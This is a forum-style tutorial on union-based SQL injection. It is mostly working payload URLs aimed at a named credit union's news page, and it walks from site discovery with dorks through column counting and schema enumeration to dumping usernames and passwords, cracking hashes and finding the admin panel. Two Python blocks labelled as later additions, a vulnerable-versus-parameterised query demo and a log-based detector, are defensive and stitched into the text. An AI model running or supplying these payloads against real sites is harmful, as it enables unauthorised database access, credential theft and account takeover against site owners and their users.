So, someone asked me to make this, so here it is...lol
A few other ones that I've seen weren't so great, or didn't explain things in detail, so I'll give it a shot.
I won't go into detail on what SQLi is, you can google that for yourself.
Starting Off
First off, you need to find a vulnerable site. Easy ways to find vulnerable sites are to use Google dorks, or to use a ready-made list of sites.
Here's a list of dorks, and some vulnerable sites.
Google Dorks
21k Vulnerable Sites
So after you've got a vulnerable site, to test if you can inject, add a ' to the end of the URL.
I'll be using this site
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12
As you can see, it loads perfectly fine, with no error. Now to see if it's vulnerable, add a ' to the end, so it should look like this.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12'
Now you should get an error that looks like this.
Finding The Amount Of Columns
Now that you've found a vulnerable site, you need to find the number of columns.
You can do this by using the "Order By" clause. We'll start by guessing at 5.
So take your url, and remove the ' from the end of it, and add +order+by+5--
Your link should now look like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12+order+by+5--
As you can see, it loads perfectly fine, so you're going to want to increase it until you get an error that says "Unknown column '(Column Count Here)' in 'order clause'".
It looks like this:

So now that you've got your error, you're going to want to decrease the number until the page loads perfectly again.
I got the error at
so I'm going to try
So my link looks like this now, and loads perfectly fine.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12+order+by+13--
Finding Vulnerable Columns
So now that you've got the number of columns, you're going to want to see which ones you can get data from.
You do this by using a "Union+Select" or "Union+All+Select" statement. First, you add a - in front of your ID number.
It should look like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=-12
Or, instead, you can change the number to null, since that's what the - is doing: making the original query match nothing, so only the union's row gets displayed.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null
Then you want to use the Union Select statement, so you add +union+select+ followed by one number for each column, 1 up to your column count, and then --.
My link now looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Now the site looks like this, so we know that 2, 3, and 4 are vulnerable columns: the numbers that show up on the page are the columns whose output you can read.
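To show why the probes above behave the way they do, here is an added toy in Python/sqlite3 (not part of the original post): a constructed 13-column news table standing in for story.php, a lookup that concatenates the ID the way the vulnerable page must, and the same lookup with a bound parameter. The table, its column names and the row are made up; the payloads are the tutorial's own.

```python
import sqlite3

# Constructed stand-in for story.php: a 13-column news table, the count the
# tutorial reaches with ORDER BY. All names except ID are made up.
COLUMNS = ["ID INTEGER", "title", "body", "author"] + [f"extra{i}" for i in range(5, 14)]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE news ({', '.join(COLUMNS)})")
    db.execute("INSERT INTO news VALUES (12, 'Branch opening', 'Full story', 'staff'"
               + ", NULL" * 9 + ")")
    return db

def lookup_vulnerable(db, id_param):
    """The bug the tutorial exploits: the raw URL parameter becomes SQL text."""
    return db.execute(f"SELECT * FROM news WHERE ID={id_param}").fetchone()

def lookup_safe(db, id_param):
    """The fix: a bound parameter is compared as a value, never parsed as SQL."""
    return db.execute("SELECT * FROM news WHERE ID=?", (id_param,)).fetchone()

def probe(lookup, payload):
    """Report what the attacker's browser would show: error, empty page, or a row."""
    try:
        row = lookup(make_db(), payload)
    except sqlite3.Error:
        return "error"
    return row if row is not None else "empty"

# The tutorial's payloads with the URL's + already decoded to spaces.
PAYLOADS = {
    "legit":    "12",
    "quote":    "12'",
    "too_many": "12 order by 14--",   # one past the real count -> error
    "exact":    "12 order by 13--",   # matches the count -> page loads
    "union":    "null union select 1,2,3,4,5,6,7,8,9,10,11,12,13--",
}

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:8} vulnerable={probe(lookup_vulnerable, payload)}")
        print(f"{'':8} safe={probe(lookup_safe, payload)}")
```

With the bound parameter every probe comes back as an empty page, so the error/no-error signal the whole walk-through relies on disappears.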
Getting MySQL Version
First off, we want it to be 5 or more. If it were less than 5, you would use error based injection (I won't cover that).
So pick one of your vulnerable columns, and replace it with either:
Or
I'm gonna use column 2, so now my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,@@Version,3,4,5,6,7,8,9,10,11,12,13--
And my page looks like this..
Getting Table Names
Now that we've got our version, we want to get the tables from the database.
Do this by using a few more pieces.
Code:
group_concat(table_name)
Code:
from+information_schema.tables
Code:
+where+table_schema=database()--
So pick a vulnerable column, and replace it with group_concat(table_name).
Then you want to add +from+information_schema.tables after your last column number, and then +where+table_schema=database()--
Your link should look something like this.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--
And your site should now display the tables from the database.
As you can see, it looks all fucked up.. in order to fix that, you can add ,0x0a after table_name inside the brackets. 0x0a is the hex code for a newline, so every table lands on its own line.
So my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--
And, the site doesn't look all fucked up anymore <3

Now as you see, we have a table called users, and that's what we want.
Getting Columns Out Of Tables
To do this, we use a few more functions similar to finding tables.
Code:
group_concat(column_name)
Code:
information_schema.columns
Code:
where+table_name="TABLE NAME HERE"
So now my link looks like this...
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name="users"--
Unfortunately, we get an error, because the quotes around the table name get in the way. To bypass this, write the table name as its ASCII codes with char() instead, so no quotes are needed.
users as a list of ASCII codes looks like this:
Code:
char(117,115,101,114,115)
To get the ASCII values, you can use this site: HERE. Or, you can do it with SQL Poizon that I posted HERE; it's on the Injection Builder tab.
So now my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=char(117,115,101,114,115)--
And the site looks like this:

As you can see, we have some important columns there...now we want to get the data from them.
Getting Data From Columns
Ok, so I see ID, username, and password, and that's what I want.
Now, we just replace a few things.
Code:
group_concat(ID,0x3a,username,0x3a,password,0x0a)
Code:
from+Table Name Here
My link now looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--
So let's break that down a bit...
0x0a is the hex code for a newline, as I said earlier, and 0x3a is the hex code for a colon.
So I added 0x3a after ID and after username, so each row comes out like this:
ID:Username:Password
Instead of using +from+information_schema.tables or +from+information_schema.columns, we want the data from the users table itself.
So we do +from+users--
So, my finished link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--
And finally, the site looks like this:
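From the other side of the fence, an added example (not from the original post) that turns the tokens each step of this walk-through leaves in a web server's access log into per-client stage tags. The log lines are constructed in combined log format; the stage names and regular expressions are my own choice, not anything from the original.

```python
import re
from urllib.parse import unquote_plus

# Each stage of the UNION walk-through leaves a distinctive token in the query
# string; the patterns run over the URL-decoded, lower-cased request path.
STAGES = [
    ("quote_probe",   re.compile(r"[?&][a-z_]+=\d+'(?:$|&)")),
    ("column_count",  re.compile(r"\border\s+by\s+\d+\s*--")),
    ("union_marker",  re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("version",       re.compile(r"@@version|\bversion\(\)")),
    ("schema_enum",   re.compile(r"information_schema\.(?:tables|columns)")),
    ("data_extract",  re.compile(r"group_concat\(")),
    ("quote_evasion", re.compile(r"\bchar\(\d+(?:,\d+)+\)|0x[0-9a-f]{2,}")),
]

# Minimal combined-log-format parser: client IP and request path only.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def classify(url):
    """Return the tutorial stages whose tokens appear in one request URL."""
    decoded = unquote_plus(url).lower()
    return [name for name, rx in STAGES if rx.search(decoded)]

def scan(log_lines):
    """Collect stages per client IP so the probe sequence stands out as a set."""
    seen = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            ip, url = m.groups()
            for stage in classify(url):
                seen.setdefault(ip, set()).add(stage)
    return seen

# Constructed access-log sample: one client walks the tutorial, one is a reader.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news/story.php?ID=12 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /news/story.php?ID=12' HTTP/1.1" 200 611
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /news/story.php?ID=12+order+by+14-- HTTP/1.1" 200 603
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /news/story.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13-- HTTP/1.1" 200 5011
203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "GET /news/story.php?ID=null+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13-- HTTP/1.1" 200 5030
203.0.113.5 - - [10/Oct/2023:13:58:00 +0000] "GET /news/story.php?ID=null+union+select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=char(117,115,101,114,115)-- HTTP/1.1" 200 5400
198.51.100.7 - - [10/Oct/2023:13:58:05 +0000] "GET /news/story.php?ID=7 HTTP/1.1" 200 4980
""".splitlines()

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, sorted(stages))
```

A single stage on its own is weak evidence; the signal worth alerting on is one client accumulating several stages in this order within a few minutes.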
Conclusion
As you can see, there's a username called admin. Now you can say to yourself "Fuck yeah bitch, I got your fucking login".
Hold up, it's not that easy...almost every time, the passwords are hashed or encoded one way or another, whether it's MD5, SHA1, Base64, or others....
You can attempt to crack them using a few sites, here are a couple that I use.
MD5Decrypter
HashChecker
Now you need to find the admin control panel, where you can log in and do what the fuck you want...
Here's an online one that I use...
OutLaws Admin Finder
Admin Page Finder
HaviJ also has a password cracker and admin page finder.
Hope you guys understand it, if not, feel free to PM/VM.